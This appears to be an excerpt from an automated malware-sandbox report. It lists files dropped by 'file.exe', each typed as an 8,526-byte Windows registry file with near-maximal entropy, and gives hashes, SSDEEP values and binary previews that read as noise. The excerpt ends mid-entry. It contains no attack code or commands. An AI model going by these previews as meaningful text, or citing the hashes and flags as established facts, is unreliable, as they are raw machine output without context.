          Preview:regf.jCo@...@.....A......K .q."......u..N.wP..`..7.[...n......]......N.R.<.;.-....y.7.P".Y..'.aE4.-.C...l......;CDk.....bn!.....`..q..x........h......(...6..E.......j.(.F.6.p..=/..K.......8...m..c=~.1.yX`...m..`....x.*......Z..;`.w..Ja...G.NB..'9...........v....<D/.Z...R......H,.2e..[\..h.C.*...+_..Lh.........k..5..=.(..DNy.....qxF....L.C.N;x1..N....D..y.?...P.#.S.....4.)#X|#...aA..u.. '..?...F...%.tq\.~=a...rP..g....N....[..s...h..i.v..R..X.X...[+.S..e.;.&:a.. ...z.$./[.J...W%hL....9...x.....N'9O..'d.<.......)..:.`.0...i....B..3.K....6G@...D.......U...S..%q.j.....R0.yyT.......: .*.U...pU.h$..X.K...)n<.QZ.6.....b.2.P..U.....xhrTp.<..%.P[......'8#..:.......LRo......k.a..X..G;..<.....t.7. .\~.'..h..PLC..d..?...+^.#...Qa0}|......x.iC...{.^...._-=..e..v.}...5~..h..)2..?7.......q...c.....~.[:)<..[....H....:Z.y.u....[.A..<.=H..j.3;.CZ..@....O...`.C....|2..^..i..~R.ATZ..I..<u...............-8.6L..b..O..2...er.#..VP....r~ ....JYB.P4o9a69.-.."..z,..
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.975188859040306
          Encrypted:false
          SSDEEP:192:qLJe8cyM1Mbohc8Ib4BaiXjgI/5A1RJAGsdYUMKL82F:QoTyM1MkhfIb0EaAGGGMs82F
          MD5:D4378637CBA093D32543DB9795281EEF
          SHA1:A8BC8F0CC604539BD2EF4D2D284A58516B5587F8
          SHA-256:656DA55B914A715CD385AA22BE7E119EB82E0C3B82D377B76FCFA083BB6F5D35
          SHA-512:E17A1AFE69F68DFA1B65031D8900C39FE9118885437BF32E08C4CA47FD36CCEC73AC71C1EE9707A8387567F1EA353ECF783D71668DC40CDE2DE84FCD6172A0DF
          Malicious:false
          Preview:regf.d..f..x.^#..G(.dgS.+2a1.k..8..TN).K.|.jzz6k.._....a.......g......"3CL.$..T".*7...Kmt.....6k$(.P.hs.tM.H...Z.......R.......h..[1.(.'.=..[..._.. )qRb4.f.s.plx...+>#.*....E.........3].5.mgA..A+....7E......n3.N./i.!....5..-.z.Y..).5.w........G....m:}H......d...A.G.@i..g..j.|....3....g.N1.U..F..z...S4...u..!.$...>..Y.C,HO.~N.......H.].Yk2&.7uHK.i.R.s....iZ...k&.....L.......~..q:.[.0z....ilg..6....(Y...x...^6.....tj[...u#...[I."mf.3...v`...l:..lW./.D.j .....Nu....6...h...Eq..dF.<.W~.......@]F.bZF..<e..~.dU.W...#m...S..}.Ex..3...8./yR...).c.u.0.W..8C..<.I.y.........V.&...)5Oa.8...&...nU.A^..o.7.O..Yv.]..3....FT.D.=.]/.[....Z....b...r3vjun.....J.r.<.Wu..........'!x.D-i.....Z..?.....1A^.";=.H.!.._....{tyS^....D.Hj.)8..H.......@U....s..[....;|y...~ij.&...&..s...h*8....P.....E.A.t.A.... ..F!.,........_.C".l.y..}.......('8...f.D)T.&..,kz|.....).9}..[......-E%C.$...S[..g>.f*..y.A.........Z:......9../..*....U?6.o..[...F..!.B..x;.N..<...
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.975766711477137
          Encrypted:false
          SSDEEP:192:BunlQQL9g7M0vzjtge6d1cx/EFAklil2F31L8LohBSk2StzwI:BulxOM0vzhAnc1MAwilm3tiMdnzX
          MD5:D4E7D465E8D12F7FE29E5738AD6A0EC3
          SHA1:992F063A291C6ED8AFAF31317552CBF8A7E57D17
          SHA-256:1D6C1D8503B8313631C7FE1EE8373F47F1CB900D2C3E207AA26A0659D2990EB5
          SHA-512:D69A4510D2EB087C133BEE7781F9323239B118847746EFD8609883F649CDA2D1B16333AC05C68822566A6E7EA4FBD98004A13E9807230DEF7C508711BE595E37
          Malicious:false
          Preview:regf.^F.V......../.......U.l..o......}...;5.e;.R...W.-j.,..f...?'Pv.~.KX.....c#E..G.......g..AL...7.$........!A.6`?......I.a.`...4.5.&...15..o.j..n.l......(..#Y...Rd[.m30.R1<D.i.....v....d.]qn.*.....pj?G#"...p.v.n..F..?Rl.|..l...uD."2pH....7U..../&.9...O...^81).T......K|-.&.J.?..BF...@.X.@qjv.|. +V..>bf.....%.)_......O....`]......:q...[...|.t.......L...y4...(.t... ...q..Y7.*.l?.g9b..d|vb../G..$&.3...Ef.u.......mR<..~Lj..~...e.g.f.9.?5......F...`..DE....o...e..r.Z0.A+(..?...F........~..$....F%HP._.a-uW.,9.v.v6..$..I.+.#.....c$..@C.^C.o..S.......W....u.v..P7.q ..L~T..#..3..#D..+.D.......................3.kU..4^....q$2o.X..............-..^6..0.,._K...^....'..l./o.....8..*gb..?Y.i#+B..j.Q&...,S7W}.8T..4Q..d6*...r.PS........]..t\<D{2!)."T.,.?........EI)uGv.S.-.;.}...A.C.8...'Wp.hbV.0.(.,gx.~.. zE.&...o...5...X...a.S........&y.....r..v...1.z.>J#..o.)9.y.].H..-........4[.4.F'#C...D-.....B6,..9....QB.._..r.>. p.q.E.oFI.xt.!z.A..,3..R..B.Y..#Px'.....a.'...
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978406945906744
          Encrypted:false
          SSDEEP:192:RQ9VGHLCJfnTK3sZBh8f44uGjRTQxy3I9jtgwWArOTXW++fA8DLVI3:RewsnHZ78f4v+6y49jtgw9OTXvSrD5g
          MD5:096E1FA6C5324350DA89FFC0D6EFC714
          SHA1:79B4BF6D8FF2B25809D5E49F9DF47ABDC6F67420
          SHA-256:01935CC83E1B6AEB75CB2A59A83CD007645604B675B57B58732C29569B550612
          SHA-512:5FAF819E5F91ED472A670A56D0C1EDE243CC5A8B3377E5276A106F5E65E38B4C47830A2A105E0CD2ABC58CD6342EB1B6C0304AB793E48FCA0B0D4C380B5669FA
          Malicious:false
          Preview:regf.s.1...e1_.m..}.=.Ls..W.e...=.X.....i ....'U.4...+x.Z}....l...:.W.....d..1..e3..]...o....B.o.#.+4.g...%S=..K.?.Jj.D._IV.]...&S......wY5(..t....(m......w..{~%W...A.JZ..U.f7g....9*3...X>..:z.}_.T..4.......9..#.;..w...................M.v..\.d..8.....wDn...).....a..h~Y'<..#.cS.Jx\.<:.U}..>.d-v........XZ.Z/G._................-.|.Ge..s...//."...#...#"..K.....+..x...z...[..J.#....o.y......!..9....7d.]S..}D......2..9M....$..-4r.6f..se..u..h.y.....maP..xL......"...^..y......./Z...d..6.<.h....U..H.+..).Si.`..k..M...b..43....$.K.`xM.....y..qj..fK.....@..Q.k.v...u...g.-F.X.t.Yk........J.rj...E+.V.t..SR.J.O....W.l..(G..x/._......j..7)..3.D{`.....Y..4.U>.E..fe0......2-..W-..cn......&h....HA.f#....J...fGX.....5J.!r9.&VhR.+6.T`.7.<~6.on...!.s...K.t...L...../.....O..)^|`...B|6D#....1".NR>PC|y..p...4....f. D..Z...K.h..l....>..g.k....e...&+.Rn..H........M..)m....KC/c..J.I.>X9..NoM..:..X"...W...*..i..Z Dw.H.d.x.....$..z..t..ed...z...0.C......!.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.977668089958228
          Encrypted:false
          SSDEEP:192:GOqkwlKqB/PEnuFCHkyP3aar9TC6r9ltIgO9TKnemLaMrE7MZ:rGvB/wIFHar9lrYMemL7S8
          MD5:BC330B98914F1E50727DA93459235868
          SHA1:FFD59705DF6E798A04B86E9E649FB3C0E2CAAC69
          SHA-256:2AC2F9D8CCCF29FE6C1E97C371138AAEFE8FBEF3097EA85AAC3826919D619DD4
          SHA-512:A5E42BB2FBCA41CA094161181E2F2E9AB22D0D55AD9FE079B37F4A11E862D1533B15AC8F645BEF63F2008C66432ED7066E82B34CBF1536DEDABB6B635257E9F1
          Malicious:false
          Preview:regf.>...G,=. .io%T.PcGd.R. .jw.)${...Zc...............fc^.L..1.g.....C?F*....%^..t\......4S......D#s..........?b9.....i.f.......X.t...\..u..W......m|.%...=u.....b!c.M....O........W....~..q...<.\3d....d."f.u}1....XN.?...h........0..W....tj._.O#.......sA=.|....s..4 [Nu';,2.....r.l.h.H...9.....V|...I.....=G.[....8..U(P_+1b;........).I bY.....`...}..c..p.A.X2.^..MWY.j/.M.~.)k..[..../b/K.u.._..O.....|...+.~.+6.9..............,..@.0..$..W(..$A:..:....w:.'Hkgg...V.....?..8.P...6:O.@I_.4..V._~.UF{.S....K)......dz4..!...(......q-4...F./.'..#.:w..Fd..c....a..s..yl..b$5.wr.fo....N5.Q...&....]..Z...PbzT..mUL.1U.Qj.B.X.d\.<..U..g/.....Bc......n...fr..b}$w..X......>...vy..~%..T.....n..^.w......5...n...b+8....u<'.60..).Q.m...-....qx....1.Q........x..L..H;..+e...b...sU.,.P.a.$...1d.I.._Q...).. .-n.|.L...1...K...5....o.3P!...U.I#.....6..8.'..........Ii..^.xd....E.ZY...../lQ.........b..J5...C.......a..!5q^.]b4..N.Rxa.h....T.Ps......^..wN.o{&i..[y..
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978072810580834
          Encrypted:false
          SSDEEP:192:/C+nW52geZqlB/rmAqhBJJ847c+VdVo1Q1yGRtXMduZwFaudiA5:/C+nW52ADqnBp7c+VdVgSXMd6w9iM
          MD5:095609376DE1414F4C32614634B7C8AF
          SHA1:F8E6D037C540E16BC8E147D0C8ECCCC953EB0032
          SHA-256:03BE543DED358FC04E2E039868ED33FCE115BFCCC2CF4D45B4F3AB9C9A479299
          SHA-512:D543470D3DE9C93DDEED5771FA4FAB6A762EEA45052342A442B6F38AF9044B7AC0502E6363EDF0DB1C0D1FF6B5D65EF29FBCFC1210BD30C8C7862504F16488E1
          Malicious:false
          Preview:regf.?....3.l.c..G.....br."#.|..q3.:S.<..~..B.L,U..-.T\......_..K.L.%A.x.....a...[...B|..,f.....^.vi^.....z.E...2(.4.^..n.....GU....+....n.....o.^.g<j....M}4..Y3QM@*.-.)3. ..G.....xx......'..".....?...>:..AL.E..2<%..7.vH.G....R...w.!..v....Y*.@......2<*..-..+...3.ST...s.W....}...d..P..Z6I7.+.-X..O.X..-.X.j..gYF.e..P.O.>....X;.....*Y.Fl.........82..Tc..Xw..d..9Y$..6R.ZN.]n<>j..!....=...?.;6....fM,J....qe+.=.JhV.|t."B}\.....=/.b......y.....g~q..>..?.i:..e+q.}.)*.....:7.....N....1'...2 ...9s..d.......C6...i4.-.C..v+l:.e..e..<.....#q,.ld].......v.&..{.Q.m...\...a...ogiD..{........j..~.H9.....2>......a.Z...n......4k....b...7r..=.v....x..6....J.r1..=d;....E..!.....3xA.....t......1B..o.^'Z.@.72Rr.........+O.e..?......~....b...RP..pTxu.B..^.... .F..7...Lnk...R5...@44J......6/k%tE...............X..mA(.../<1..........of..n.XJx.l......q..!E4r..9...{.w'.......+.bq...:<.kr...p.U\"_......Gm(..#...p..w..1.....Y..x...6.......<\....;?[B._.`n..
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978867509560215
          Encrypted:false
          SSDEEP:192:gaSRav0jwkxSoSokc0AD8jDiDlzVkFJOUdYkMV5YWCxLbSKhP:gNav0jwk4mzwjGxzVkNdY1QSKt
          MD5:E06288D82F65FFCD02E5AC57B38FD55F
          SHA1:905958368D12E74C759153E53825D3D84D72E321
          SHA-256:7469C9A2B9BBE50E4597D6A6DCB016AF2EE9D13C6DFF2FB4864646BAC73105C6
          SHA-512:F5FA07DF54B0B39BACB1F7EBB7EE968F456983FB84A3642CDE995994CE53100B3E3B5C30632428D30885C8AA13AA6C5CE4DEFFDC6360F08F8CB9FC4BEC23D66B
          Malicious:false
          Preview:regf...R..G&.DJ...n..nTNW.d.*...j....A}...<.j.\....CE.7g?E...........s.O.o....l...5...P...@.......~t.......f..Z....V>f..~..ldC..BMO.`......xlO@.gk^..%;.7....d......+?x...9.....B..Dj...+...{3.........`.&WoA...E..y%......m<$.].eH.g..Z...o......(6..2....{..i...[.T.v.....,s..sg.yn......$.\A.......b..Ph2..-..ir'q2.Y.*i.)..x.d.........3....k(.a.Q.......`...F.A..n#.h.4......H....`._.E.0\Yi...%.......-....SWk.1.b..N.V..f...LT.B..~l-D.1...zP..R.....|2-...G;e.e......1.nMA.Q..%!...0....fM.B..Jk.ea5u.i...8.kXS..GI/.#A..*.~<.....l...z.....+..-.."..G.N..F.ce.....F...~., .....zI-t.."......v.l...Y......{z..._..Z...`..K.....W.en..^.\$h....S.....8].!...7..z.-.h...j.}.Jn."..u;........X....>..b..6V.d.jr..?!.N.`....o.E...j}...K.D.Q....x^r?(.?...7+.#...>.i3...Nh.w.g...bU.?..g...\.....F...jv.*B.........\3?.e...l.~.;......a.....<..z......B.....8w.!.x.... .=.8....".0..+.n..J.h...$...../.....yq+.3.V+.9.o3.M...9.u'\j.........(."..cZ.7..'....@..2[LO.o...<?A
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978195828565846
          Encrypted:false
          SSDEEP:192:PabiihTbCkMJRW72lC3t+GET9oBlIp402ssSIZQeZJZ8Bn1oJQ:P4iixujRuoth9ocp402ssSIZQwZWnR
          MD5:A2DC443CA4B151F262D0AD6A89E4AAD4
          SHA1:A7B58B33EFE9A06371B7799D01DC1814E1F218D5
          SHA-256:C5029BE8DC0E75E4CBD8CFA130F16F6D2521242C6D2DC314AC315CA49059024E
          SHA-512:74C495C833EB59C29ED6331BAA33B939F07DDE7AA06959F0DBBAE6673C94D13E554BC8BD1A2E7F7EF61C2299E3488F62C5D8B8BBD4DED37644D8ED02B0225051
          Malicious:false
          Preview:regf...D91......t...8.z..gH..b..n...za.vl.U.._..x@EH.f..Z`...ELc.....a.-*{...Y...0.|4....h....s...3.,..qFk.,%.n..D.q*......W^.i.w....3.9..sO.wo..$..0..t.'/t.7}.G..n.....n...EAB..@.N.x......*.(4D..]...D..w.e.$.L....U.Z....3."..t....m..k...>._a.>......l...H.B. w........8..>...,g...kp.nZc..k..-... }..I46fd.Kp...m.~./$.......EjY....t...b... X.)...s...0.......X0/.....y.A.g......45..v..j......@.........q......N+..`../....(...qFgb..O.B.4P..0....]zM..e.[^....}.......h7..Z.j.^..A.<]w .k.@..w]..#..<So.b.o.......}...t.,.Rx..J6+.uL..f..I$...Ci'}^....Z...Z.lod..7..:...6z'."Xj.5.....U....6....<.D....u.XQ/2...;.?E+..2m...9.>.O.BE.(3k..K..............!=.n8.T.t....=y....O.F..8K+.1L.N2sd..."..R.N...,Z...?O.vfA.g#l.....y...D...aT.J.DQ.:)oR./Z..$.+.......=._..Fb&......U.Y..*#@p..'y.m..7l1.KF...b<.k?.B.w...a.}5.F?.y.;(9?;]..........)...y..2.......6......]...F^B..T.%L..0....[..\.w...c...O}.S.x..J...].d!NZ........,.rZ.....6x;.......V]..7.%*.k....-zL.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.9769962075597824
          Encrypted:false
          SSDEEP:192:oeUR6ITmeEBNivzSZPgDxyAVweewQC9LeUW3W1:oejITmVBgrJIZjwQfUUW1
          MD5:6AEB55F54DC055DE49B624D2798FFBA3
          SHA1:BD7A1B105ECCCAADB9D4457292B8A43A4537CF83
          SHA-256:8B0822EDDED3FF4CB6ED7086CCAACDC559977C4A553C8191C8380A8E10CC9490
          SHA-512:95E8A08AB93560B6B537327A2F6C4F8B95FA6C8061C70C17D21E58578FB777F45CE1CEEE3F29C18A491E29B6779306E814414C2370672A04A4DD25E3BC55DF00
          Malicious:false
          Preview:regf...H..:.....(d...)z.......`<....lhG..)...b.Qy...-...9..a. ....`0...&.fN..CR....D`....)|..1......y...&..%..{.k..}..7...@p#......._M...iz.~.V.)29r.=..p..........e5.m\...Ly.}....Z.W..A...-I....qA.v...O/..[x.......,E.#.Uu3.{[...W..j!a.g..9v......B....|!..2.(.....G.#.N....E.z|G.{z{.s0.g..8..xQ.tO5..;....~Z.Z$L)...Cd..CGx....}vi9.4v>....-.B...... Zd#<..Wu.i...Y9.....}.4.......oYaw.$.....=e..0xS..,")... V...p..V..@.S..G.&/..7$u.a...E..D..`e......cI..L....A.... ..7XA...|.o}.c.5....{....g.L..3:j(.%..7S...T..?e-.h.......0.X.. ...' O~.:kG.I.T...zn[C.y..."(s....R.~....2<!........xfa./pJ......mc).^...\..#m....A..E.3.I8.q.0.7W}.WQy.2.`.P.H.QKp.....XK..9.b.5.).._..L.Gw....?Z.... .IAv}O.........xp$.?....Y..w|Q....@..}......G..WZL.1...K..m1.e..7C....... ...e...Q:..|9...|&..=.@~..6..M*.".p.~.s...U.)...m#f.......iX..........O8W=..>.......n29.x.q...4.m.|.;<P...3".Ej.^..I....X.{..MS..P>y.xCe.. .Z........o.L.=.F....E..RT.d.PiO.......S.=........lR..q.Agc^;.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.976906887154016
          Encrypted:false
          SSDEEP:192:osgvOE7Sqi2knH30Vrolnggwks0Lmr9rtrusLSYUrX4Pg:H3xH3FgOurgYUrII
          MD5:CD5D4AFCB157D6A2F41285DC9298FB62
          SHA1:E82AB52E0AB05CE8B45F04067780F044CDFF9DFA
          SHA-256:D99CCF8A4D199E565789C5F918FA2C9E2D7CAEC66719BF4DDF0B566C58DEE4C7
          SHA-512:DAF1F7FC86C890703E26479E8A46664F567C64F10321B699D5D68E6766435E87E65692E1BFA31C10892CD3D56461D36CC636D3030D0E9502E992656C569EE6E1
          Malicious:false
          Preview:regf...9.A.........)..SP..|.9-......_.."..z..........|R....v..K..Q..N1..sY:f.G....7.L.y...^.o.^D[.".`....B?;.....u..\.M..k....1..o..4.].".e0..8....f@PK..Q...u..`.4.R....q.......^wP~...,..e.N...=......G.J-.4...I.!.4c....j...1p..F..A...|;2...d.._y.'.0?....8.j...O.......{J....j...].E..)+J.:..F.{........1.%.|.."..<..A|.=...R..F6...o,n#D..7..T......^8...H.m.J.|v.]m.aq/...)...ew..fAf...a)|.M.6..?OhD8.O..G.f..E....Y.Zh..B...F...!.AQ..Y..i^+.z#...H.....,}..0...9j....%..R.p3......3.]+7.]...z.iVo.....#.....r.E..9 ..r$.Z.!a7..)...M^.~.'.|`....?.;..h._..&"..T%..I4....h6....Z.1$6...(.}..g1d.....{..,.Uf...3K..(W.\.vY.....{.o_!...hz<`.t7s/.J......[l0h;.4....T.q.C...._4..W.'...LY......z1.@.F..../!.AZN.L......+dH.&%)...>....;......I..x.&n...WetqSy.r^Kb .....#D.,5Q....H:.{.E.a}....o.2.v.=.6F.,.:.w....x..6....#m.-.!fw3...QR.(.Z...$.s...!.h.J.Q...T.B.0....0..%\....7....z.WM.~nP..mC._.i%hO.*...._..1Rr.4i...qMj......==G....t...m...3v..`....Ujw.._u/...R..Wr`...R.~
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978807294721602
          Encrypted:false
          SSDEEP:192:CpXd1q0t+wf4AABCj523HLh8radDtMde0rr+vquF3Mfh:Cf1XtbwVZ3GrcDyfXuF8fh
          MD5:0D9A73C1662F3641C68610CD21491C9A
          SHA1:01CA6115466C8C76901A08352AC899843438F3A2
          SHA-256:77E5AA4F2DF9F071A1AF157A638D90E6D92A024137D30F2EDE680C5A840586D1
          SHA-512:8B4CBD2A472D5C0C66E7FE05643AAE418ABAD026832CA656527F9D2D343837ED850829DBD4962A679C756B0E5159F19545A42A6A24308223D6C857EEBE09CC2A
          Malicious:false
          Preview:regf..+..Y......E.r...B....Py.a..O.B..w..k.)..8.^.-Vj8.rqn.GG.....b..D.k...Zh...g....:.."-.c....C.x....R...&...................5..D..SCA.....%..........^&O....OpX..+^.pW...R..n.*.......m.T.*.G...Ox...7..~...! ...,I.....[...zj......uP<...#.4t~.. Q.....|K.......q.&.MC.v..X..H.q..koH...$....kE.*...U.i.jLO....$....&p.R..=.....i.=...E.~...u..Sb..e.k....).r_...9Q....r.M.f..L\.Kc7"\Z..b.6.)..|e..]..\.MB.,..B.....Z..f..R./..8..R...W.VQ.y$. ...9}............w.#..-m...9........#...hbV...&.K.Q.dA.)..8o.BV.4De.....m..x.Z`KM.....!.....S1....t..".A...mgy[...G.{\.}.G.h|...|6!6}.5.<..pF..L.......16.{...9.......:..89...m0....F.^.....#x].WoK.g.Mc.....~.$F...B...5"Ie.....I...w....3...=....k.y.....'..k...*M.c.'..w{w,...T~2b.......K....>.f.a<.........H..aD.... (0..jy.w..K..V....j...Y...t.u...9,.fW...A...I...P....+.4z9.~B...NX.l....-$....V.E....6+8.....L.......y.g..mY...g.(.n#u|Pz.G...3c......rV..k...k.o...9OI.).9b..'.....0..hy.z&..p.".......&.......^.F.6..j....
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.977541545026684
          Encrypted:false
          SSDEEP:192:hZn9Sm/N+fk/6ereNuwPq8Rl4uOUrdaEsHPhgZaw1JOwBUKXw5s:hZMq+xerSEuOUBiwfOwioj
          MD5:3475B445CE2BBE768A77DD18DE667982
          SHA1:F2F2E8B0883FBA3AC39922FF4B2D6908DCCD0543
          SHA-256:E672CF24CF955F09FB60455708B39836D52FCBE282A8E3891ED1BA7253488C82
          SHA-512:9F3ED49A20588DB93C5F8839D60847BA6A3CF8C32BD00E9620F2F29712E4D1CCDC9B48C66D46D04617B71BB62E6EF5C323D7241DD0B130655191C5BA40607225
          Malicious:false
          Preview:regf.....f=F......H.....N.R+%....sm.HOM.3...X......Ti.... ...j.5D..... .`x.....@.aq..V}._.h!.lN.x/..~7.j...]..`......h..'7...G..~..6.5dL.aZE|.E........}..W.....4r.2.<'@...u..5.....R...I.q.G(]H...46!.<.x....s....H.5..)0.Z".W.<8R..M..8.9_..42..-|..[w=.0GQ...........X.r."...$.D.'&.....DN.!Nz.,.-+G..[....0....R.4t. .^.,..D.6:.l..]<..=........C. |..UgM...>.......*.iD..-t.X....M...q..........t.......I......}...O...2....:u..........O.J>...........Lg.c..lr.0.!....r$.v....?..y^.'...1..X..m...r..&..L.|jq^...). ...I-d..d.%9..<......3..W.J!...W.P.\.....i.D 9...Z..u6...[r.S.0<.h.i...j5.}....\O.....s.$.....?.....1.:...F..Fj.8.h1....cux.5h..w..:4.9(m..).Mb.....w...$.E.U......_.....@*l\.XB/.h.....%...._....Fu.....P.......(.....k..#.X.U......Q..vq}r......d!4..k|....m..._.:.Bu...........Cn.;.q.j..x\..>g..K<...]w6...l...4......H...L3...S.....=.c..S.ue...k.<.=..ST.....M....s...*C.......WiJs.2..$....So....I.P{..._..9........%.e.@..u....E........~r.;v.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.975851352071252
          Encrypted:false
          SSDEEP:192:Uwpg5HncrrUAS5K+qfI0boLOwJv9G+N5ae6IxIqHB6urzfEr:FgcH/lbQ1Jprae6IIqHBtza
          MD5:6911965F20F2274762FAA0681E752890
          SHA1:3A38C3DDAB81C0E315A30F34FC113E6B2D9D4919
          SHA-256:0C8E86B50AA4186D0BF3D329C88E8264474ED7AA740151FD7D55D9F4E144BEA5
          SHA-512:8FF6498673AA066D6326D1B64239EC38E239D15392640FA0F3CA8834E9A3160B704E1BAEB8264BB2C5392F6D6B310F1236298F38E8643B80B659D8133A4DC9D7
          Malicious:false
          Preview:regf.X..i......=.}m.W)..-z.;...^..-........P..A:4...yM..Z..G..Tn..JDT....~$..]..N..H..$...~..cW..\..+..Y....ys..a.?..EfR.D....}i9.G.O..4..x.`..LHmP.k.cV..v...N.`..YLp:G)!...5..o..Vk|z....M.2-..l.NK.DA.VS..H.mD'..0..Cp.5^.....q........I.i.<..O.......J....w..F..~Z.L.o.....FH.4!.^..a1~!...~.....K...8.d]Ep1H...01.2#..8.\.9.E.o,......^..}.v....\..H.l.-p.....T.i4>.pC...^e.1"%...(9Ms.......D5..3..t...^..d.F.....}.......%...JI..#5.v8o..Y....'..h..=.=..=. ..".*.|...S.......j...A|.v....0T.r.N.q...R.^...:[H.O..4C..3.l.?..|^....Ld?}.B.y..WP.?a..|.T...:.C,.l"..d.E.%wD.;`'j.D.z.Z~..cp.C...}.Je!.t..xa......pd.Z...........i...OMK..<~A..U.xe...!4.j....EM^E...D.^..%K..O..2.2(....Y..|......A...s..7.v.f...)&.g.Ap....~k......60T..x{y..R@n...#.(..bJ....3..L...1#....O.v.n.'T .&...6.W).....s..\o.P.|.[S,.<.'..A!.....K...&T5..b.%.e.7.^..M.....p....,..}....~tR./`"I..$...j.Y........_.~Q.A!:.?!...j.Q%.L.Z.g..(F*.FY........4ek.....~.....>..P..=.l.e.?.s|......%Y.x...E....
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978441453861439
          Encrypted:false
          SSDEEP:192:R9NMjSiakNH+33vt0wMFtBJSv6d2ivMdoSwT+XFGrfu22vG:R9Wjx9+33v6wSBJSvliUdZXFIfj2vG
          MD5:51F4D1E3B03C33A2B3866EF6EE3E5844
          SHA1:C3795823480D8370712F5AEA400998C150B350C2
          SHA-256:5BA2D19120815AF61AA0FBF771327BBCF1E17370D28764F6024EB9C238868CC1
          SHA-512:2EC0B2BFB802016AC94615531EEB407697E04482404CE90F8BCE77A09454893BAFD6F56544DF0E3AB3D0A4273938722283AC8C595A2907D3587DD6796469CFCF
          Malicious:false
          Preview:regf.`..k2....WX.....r.X.....$....p...go.AJ...............V....; i4.E.......B.Ya..........P..!.....x.....;.U4...........7......~".A1+.~.]P....5K.1.n^uH.....G.LEi......./j0.%Ym.....#....m.|...q...o..?I...u....4.Az`.....cE.W..j...*..7..O..A..)3..<..7,.Za...!DaU1h.3.....`:...fL.NP^3...cM.._.a....y.c...o..AN..A...W..._N.k.fX{...w.b...A..m`...oG..)..d...LG......H-.}.%..Z..c.ui...v..J)....&b...-..-..QMq.^....o....}....m.T..W.-w.IA.n...9l9...Qr.w.........L2...14pw..4.....3~..Y...>....K...|&...7...!..........n.%pH.....Y.7..f...P..Q.4.{.x..QJ)1..T.......E....(qk|.#.Jkt:...w.=.....%.0q.".).;Nu..8.>Cz.Q.....e..z1..(..QG.d..s.[..t..1"p.L..~..a)8.....e .....<....yp.b...8.Nt.U...oJ...|.d.i,....>.i.zZ..<.F....id.<PG&"......^.Z....].......Z.P.o.s..ix...`....5K.7s.3bD..=.(y.5.L?.'Q..pJ......3V...X.~.M..v.,..[[.......0.n3r..>.}.......`....^.} ....CH.M.e.0.Ye_.. [....G.cMI+`y..{A8:.x..gK.......x...z.#...:t...K.<..c7.^.3KZ|....y....V.Y.).....t.B.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978512461651568
          Encrypted:false
          SSDEEP:192:KaILmFrbfo6XK0r3PA0Ur7x8LNuZ6RQm7H5XXGs2JNJjE+Stida:HILmFrbffn/A0Up8LQZ6Rn5GsGjEBIa
          MD5:4F1D0622176A09E52AA1B88412454C9B
          SHA1:6376F892FEC656F2F5473DE41502A20A3A53C4BA
          SHA-256:0F7D5057CE1558F32C7B5A39AB7085F45AF44B4CDFF6B3FAA71861FD72214A9B
          SHA-512:C40CD2FA6E05FEAB58A1C3AE810FA064A63F1892F615D382DBA2CAC53F2EC66D918102A0F3A9A0B017C4D9CF2FF15D3EB5AE7D194FFAFE9BCD0446504C53E197
          Malicious:false
          Preview:regf...Vw.d...5........W.....G.....y.._.....wj...rtk........K^...U..D..Q..,....w...6..R[U.}......].9. .....f.Q..........M#..b..S..B..}....._<S8.E5Hi..%..nwS.xH.T.3S.:......t>M...F..v.]..A....(......kr.A.>1.".97=|... .......al.L'Fy...Nj..^.5.<...$M.k.G.Tgm..)..*k\A.W..#I.z...^.zH..M...A.. .y".s..^.N|U...w*,.G....+.'...x..x5:..Lh...k.B)..t....i..~...tWCS...db...}......4..F....:............JV..&.Vk.9.UIZ..qd..].....c.............x....c.7V..r.d...6...2<...;...-..E.G..V..pN....3.3|8;)[JQv...:.j....0.V.H.RWs..\.N.......>....x.Lh.9../.....8..&....%~..>b.+\l..Do...3...|H&..A..S D.`...gl..`....p.S....Kn..:.....h....!h.}..`..Y.X..d.?..J....i..#. R.ll....v,...$....u.K......!....j..WO8...............T.~...f[..lP.....e.3e...K..V.Me..s.......\v.U....>.K.+.j...".m.W......p9X4f8.o)..It....7.K%....,MI..x.{....n.Wmvw......#-.#..............t.N5..)=q.;.....6.~.A.....R...|.....H.....3...t[..M6C.EcM."}.=..B..6L.....;;...SC..oQ80Gys}k.p.a...}....M..|.t..
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.977493043768903
          Encrypted:false
